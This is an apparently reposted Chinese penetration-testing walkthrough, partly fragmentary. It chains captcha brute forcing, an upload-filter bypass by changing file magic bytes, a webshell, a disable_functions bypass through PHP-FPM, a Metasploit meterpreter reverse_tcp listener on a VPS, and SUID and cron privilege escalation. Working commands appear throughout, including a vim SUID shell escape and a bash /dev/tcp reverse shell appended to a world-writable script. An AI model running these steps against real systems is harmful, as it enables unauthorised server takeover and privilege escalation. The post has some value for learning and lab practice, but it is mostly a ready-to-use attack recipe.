实战技巧分享

可以看到是有验证码的，也不存在验证码无限爆破漏洞只能使用burp插件验证码识别

1、首先是下载插件

captcha-killer-modified

2、获取验证码

2、getshell 几种方式

1、用无影响的

bypass disable_function

返回ret=127代表函数禁用需要bypasshttps://www.anquanke.com/post/id/208451

案例解析

文件上传点开启我们的 Burp, 进行拦截发包， 经过测试发现只能上传 .jpg 文件， 此时我们需要绕过后端过滤, 经过查询后发现修改文件幻数就可以绕过检测

我们来访问我们的文件可以发现获取到 SHELL 但是马上关闭， 我们查看房间， 了解到需要做一些规避

首先根据提示内容， 我们需要先找到对应服务器的路径， 在目录遍历时， 我们发现了一个 phpinfo() 在此我们可以找到对于服务器路径

思路打开

既然上传文件后无法长时间存活，那么就可以反弹shell，或者在能执行命令的这段时间反弹shell到msf上

就比如蚁剑我使用插件bypass后，虽然能执行命令，但不到一分钟就又不能执行了，这个时候我的想法就是把shell反弹到msf上，顺便还能跑一下自带的提权

运维人员会禁用 PHP 的一些 “危险” 函数，将其写在 php.ini 配置文件中，就是我们所说的 disable_functions 了。

proc _ open ()已被禁用

只能上传msf木马反弹监听了在VPN上直接安装msf，省的搭建代理了而且是低权限只能先msf，再提权了

php-fpm是PHP内置的一种fast-cgi

看到这里可以看到PHP-FPM找到tmp目录下的进行绕过.antproxy.php

/tmp/php-cgi-54.sock

有时候没成功，可能是php路径有问题通常在

`/usr/local/bin/php` 或 `/usr/bin/php`

vps搭建msf

安装msf

curl [https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb](https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb) > msfinstall && chmod 755 msfinstall && ./msfinstall

2.安装postgresql供msf使用

sudo apt install postgresql

3.测试查看数据库状态

systemctl status postgresql

设置数据开机自启动systemctl enable postgresql启动msfmsfconsole

设置监听器

msf6 > use exploit/multi/handlermsf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcpmsf6 exploit(multi/handler) > set lhost VPS-IPexploit or run

suid 提权

查找拥有 suid 权限的文件

find / -perm /4000 2>/dev/null

vim 命令提权

https://gtfobins.github.io/gtfobins/vim/#suid

/usr/bin/vim -c ':py import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")'

没有成功

旁门左道提权

计划任务提权查找 777 权限文件

find / -perm 777 -type f

写入反弹 shell ip 端口自行修改

echo "bash -i >& /dev/tcp/you-vps/10086 0>&1" >> /tmp/hackme.sh

原文始发于微信公众号（迪哥讲事）：实战技巧分享